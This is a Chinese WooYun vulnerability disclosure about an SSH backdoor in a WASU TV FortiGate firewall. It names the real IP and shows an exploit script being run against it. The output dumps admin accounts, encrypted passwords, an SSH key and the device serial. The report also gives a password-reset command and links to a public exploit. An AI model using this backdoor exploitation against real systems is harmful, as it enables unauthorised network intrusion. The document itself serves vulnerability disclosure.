当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171208

漏洞标题:华数TV某FortiGate防火墙存在SSH后门可vpn入内网

相关厂商:华数数字电视传媒集团有限公司

漏洞作者: bitcoin

提交时间:2016-01-20 11:00

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:网络未授权访问

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

vpn入内网

详细说明:

ip:218.108.5.6
该FortiGate防火墙存在SSH后门
查了下whois
确认是贵公司的
WHOIS Results for:218.108.5.6
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to \'218.108.0.0 - 218.109.255.255\'
inetnum: 218.108.0.0 - 218.109.255.255
netname: WASU
descr: WASU TV & Communication Holding Co.,Ltd.
descr: 6/F, Jian Gong Building, NO.20 Wen San Road, Hangzhou,
descr: Zhejiang province, P.R.China 310012
country: CN
admin-c: XZ1291-AP
tech-c: TF142-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
changed: hm-changed@apnic.net 20080123
changed: hm-changed@apnic.net 20151202
source: APNIC
root@bt:/var/www# python forti.py 218.108.5.6
BC_HZ_60C # show user group
config user group
edit "FSSO_Guest_Users"
set group-type fsso-service
next
edit "Guest-group"
set member "guest"
next
edit "admi_opt_G"
set member "admin_branch"
next
end
BC_HZ_60C # show system global
config system global
set admin-sport 8443
set fgd-alert-subscription advisory latest-threat
set gui-explicit-proxy disable
set hostname "BC_HZ_60C"
set tcp-halfopen-timer 120
set timezone 04
set two-factor-ftm-expiry 60
end
BC_HZ_60C # get system status
Version: FortiWiFi-60C v5.0,build0271,140124 (GA Patch 6)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2001-01-01 00:00)
Serial-Number: FWF60C3G13006149
Botnet DB: 1.00000(2012-05-28 22:51)
BIOS version: 04000031
System Part-Number: P08947-06
Log hard disk: Available
Internal Switch mode: switch
Hostname: BC_HZ_60C
Operation Mode: NAT
Current virtual domain: root
Max number of virtual domains: 10
Virtual domains status: 1 in NAT mode, 0 in TP mode
Virtual domain configuration: disable
FIPS-CC mode: disable
Current HA mode: standalone
Branch point: 271
Release Version Information: GA Patch 6
System time: Mon Jan 18 23:40:28 2016
BC_HZ_60C # show system admin
config system admin
edit "admin"
set accprofile "super_admin"
set vdom "root"
set ssh-public-key3 "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1xGmeuxT0vnJ5Z+8dMW3j2MuJNApkqfQlX5Zxh75G4GpbJ6wDLD3X3S+G3Ue4AOSxtpgSF8T4c8yfY7j/HtxwwONrHfCNRz/ULs34f+9svHUIcPDdNYkrePmyOm3lKqFrTn1FJDbPlLTnC2oZTSuoX5KAx3/Y5UYbFvBosjUW7R7Duy618fZ15wrFoKoXM3LUUrI4ZZfjwgCzpZQgyWJJV4iLkC94AlICPrNlkQoEKPMMzJKfAVLv4buvNGDc3Cu5CUl0qQlEIfkXZByC0BlKC1EeNhR0VnXQldvYT/mo4y3qDFPVyPK9Ec+bDPXo/z4XxTD31eWWQq00VioEngzp"
config dashboard-tabs
edit 1
set name "Status"
next
edit 2
set columns 1
set name "Top Sources"
next
edit 3
set columns 1
set name "Top Destinations"
next
edit 4
set columns 1
set name "Top Applications"
next
end
config dashboard
edit 1
set tab-id 1
set column 1
next
edit 2
set widget-type licinfo
set tab-id 1
set column 1
next
edit 3
set widget-type sysres
set tab-id 1
set column 2
next
edit 42
set widget-type gui-features
set tab-id 1
set column 2
next
edit 4
set widget-type jsconsole
set tab-id 1
set column 2
next
edit 5
set widget-type alert
set tab-id 1
set column 2
set top-n 10
next
edit 21
set widget-type sessions
set tab-id 2
set column 1
set top-n 25
set sort-by msg-counts
next
edit 31
set widget-type sessions
set tab-id 3
set column 1
set top-n 25
set sort-by msg-counts
set report-by destination
next
edit 41
set widget-type sessions
set tab-id 4
set column 1
set top-n 25
set sort-by msg-counts
set report-by application
next
end
set password ENC AK1c6/7vU6fy5GXrH2O4eWJuer77FlPff9GGE8qWEXfkv4=
next
edit "admin_branch"
set accprofile "opr_admin"
set vdom "root"
config dashboard
edit 1
set widget-type gui-features
set tab-id 1
set column 2
next
end
set password ENC AK1c0b+ocn3KOdTKwaid97NzcK/1hX+4UQeED1Kgt7RjgI=
next
edit "radius"
set accprofile "super_admin"
set vdom "root"
set password ENC AK1XORarUH865C+TeuWunT/E+nseKMhhrN/M5NU/criK+w=
next
end
可任意重置管理员密码,这里不深入了!
可参考
WooYun: superalloy巧新科技FortiGate防火墻後門可登錄VPN
点到为止
config system admin
edit admin
set password ****
end
利用脚本
http://seclists.org/fulldisclosure/2016/Jan/26

漏洞证明:

BC_HZ_60C # get system status
Version: FortiWiFi-60C v5.0,build0271,140124 (GA Patch 6)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2001-01-01 00:00)
Serial-Number: FWF60C3G13006149
Botnet DB: 1.00000(2012-05-28 22:51)
BIOS version: 04000031
System Part-Number: P08947-06
Log hard disk: Available
Internal Switch mode: switch
Hostname: BC_HZ_60C
Operation Mode: NAT
Current virtual domain: root
Max number of virtual domains: 10
Virtual domains status: 1 in NAT mode, 0 in TP mode
Virtual domain configuration: disable
FIPS-CC mode: disable
Current HA mode: standalone
Branch point: 271
Release Version Information: GA Patch 6
System time: Mon Jan 18 23:40:28 2016

修复方案:

升级防火墙

版权声明:转载请注明来源 bitcoin@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-20 14:41

厂商回复:

已确认,正在处理

最新状态:

暂无